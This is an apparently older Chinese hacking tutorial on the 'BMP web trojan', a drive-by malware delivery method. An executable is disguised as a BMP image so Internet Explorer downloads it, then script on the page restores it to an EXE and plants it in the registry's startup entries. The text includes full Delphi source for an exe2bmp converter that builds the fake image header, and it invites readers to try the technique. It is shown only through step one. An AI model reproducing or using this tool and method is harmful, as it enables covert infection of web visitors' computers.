详解BMP网页木马

　　首先说明这不是什么新的东西,但最近有人说我们没有,那就随便写编文章放上来了,大家自己试验一下. 何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行.

　　然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到TEMP目录.再编写一个脚本把找到的BMP文件用DEBUG还原成EXE,并把它放到注册表启动项中,在下一次开机时执行.但是这种技术只能在9X下发挥作用,对于2K,XP来说是无能为力了.

　　看上去好象很复杂,下面我们一步一步来:
1) EXE变BMP的方法. 
　 大家自己去查查BMP文件资料就会知道,BMP文件的文件头有54个字节,简单来说里面包含了BMP文件的长宽,位数,文件大小,数据区长度,我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦),这样就可以欺骗IE下载该BMP文件,开始我们用JPG文件做过试验,发现如果文件头不正确的话,IE是不会下载的,转换代码如下:

　　program exe2bmp;

　　uses
 Windows,
 SysUtils;

　　var len,row,col,fs: DWORD;
　buffer: array[0..255]of char;
　fd: WIN32_FIND_DATA;
　h,hw: THandle;

　　begin
　if (ParamStr(1)<>'') and(ParamStr(2)<>'') then begin //如果运行后没有两个参数则退出
　　if FileExists(ParamStr(1)) then begin 
　　　FindFirstFile(Pchar(ParamStr(1)),fd);
　　　fs:=fd.nFileSizeLow;
　　　col := 4;
　　　while true do begin
　　　　if (fs mod 12)=0 then begin 
　　　　　len:=fs;
　　　　end else len:=fs+12-(fs mod 12);
　　　　row := len div col div 3;
　　　　if row>col then begin
　　　　　col:=col+4;
　　　　end else Break;
　　　end;
　　　FillChar(buffer,256,0);
　　　{一下为BMP文件头数据}
　　　Buffer[0]:='B';Buffer[1]:='M';
　　　PDWORD(@buffer[18])^:=col;
　　　PDWORD(@buffer[22])^:=row;
　　　PDWORD(@buffer[34])^:=len;
　　　PDWORD(@buffer[2])^:=len+54;
　　　PDWORD(@buffer[10])^:=54;
　　　PDWORD(@buffer[14])^:=40;
　　　PWORD(@buffer[26])^:=1;
　　　PWORD(@buffer[28])^:=24;
　　　{写入文件}
　　　hw:=CreateFile(Pchar(ParamStr(2)),GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,nil,CREATE_ALWAYS,0,0);
　　　h:=CreateFile(Pchar(ParamStr(1)),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,nil,OPEN_EXISTING,0,0);
　　　WriteFile(hw,buffer,54,col,0);
　　　 repeat
　　　　 ReadFile(h,buffer,256,col,0);
　　　　 WriteFile(hw,buffer,col,col,0);
　　　 untilcol<>256;
　　　 WriteFile(hw,buffer,len-fs,col,0);
　　　 CloseHandle(h);
　　　 CloseHandle(hw);
　　end;
　end;
end.